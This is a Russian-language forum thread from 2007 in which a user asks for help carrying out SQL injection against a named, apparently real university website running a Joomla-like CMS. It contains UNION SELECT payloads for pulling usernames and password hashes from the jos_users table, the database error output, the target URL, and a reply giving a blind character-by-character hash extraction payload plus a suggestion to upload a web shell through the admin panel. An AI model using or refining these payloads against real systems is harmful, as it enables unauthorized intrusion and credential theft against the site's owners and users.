реализация SQL injection
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
реализация SQL injection - 2007-04-10 22:55:35.083333
|
|
|
ns4220
Сообщений: 3
Оценки: 0
Присоединился: 2007-04-10 21:16:52.580000
|
Добрый день! Есть некий сайт, на котором в одном месте неправильно обрабатывается входной параметр скрипта. Если поставить вместо одного из параметра кавычку получается следующее: SELECT id,name,parent FROM jos_menu WHERE id = \' ORDER BY parent DESC
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY parent DESC' at line 1 Раз так, то я сформировал следующий запрос: ...Itemid=1001 UNION SELECT id,username,password AS parent FROM jos_users Добавил AS parent так как в оригинальном запросе есть ORDER BY. Но это выводит такую ошибку: SELECT id,name,parent FROM jos_menu WHERE id = 7c4d0718d9dac0b8c4dc69af91c3bf8a ORDER BY parent DESC
Unknown column '7c4d0718d9dac0b8c4dc69af91c3bf8a' in 'where clause' А если написать: ...Itemid=1001 UNION SELECT username,password,id AS parent FROM jos_users То не вылетает никаких ошибок, но страница вылезает вся кривущая. Посоветуйте что делать?
|
|
|
RE: реализация SQL injection - 2007-04-11 06:39:51.753333
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Ну так строки в запросе в кавычках должны быть, поэтому и ошибка… WHERE id = '7c4d0718d9dac0b8c4dc69af91c3bf8a'
|
|
|
RE: реализация SQL injection - 2007-04-11 17:14:58.770000
|
|
|
BlackDoor
Сообщений: 200
Оценки: 0
Присоединился: 2007-02-16 06:55:09.780000
|
Ты бы хоть название сайта написал[sm=mad.gif]
|
|
|
RE: реализация SQL injection - 2007-04-12 00:27:45.240000
|
|
|
ns4220
Сообщений: 3
Оценки: 0
Присоединился: 2007-04-10 21:16:52.580000
|
Вот сайт: http://szf.llu.lv/cms/index.php?option=com_content&task=blogcategory&id=24&Itemid=
|
|
|
RE: реализация SQL injection - 2007-04-12 17:45:03.286666
|
|
|
charli
Сообщений: 50
Оценки: 0
Присоединился: 2007-03-21 22:06:32.833333
|
Itemid=1+and+ascii(substring((select+password+from+jos_users+limit+0,1),1,1))=$num/* попробуй посимвольно там мд5 хеш 32 символа задолбаешся :) это движок похош на joomla шелл в админке можно залить
|
|
|
|
|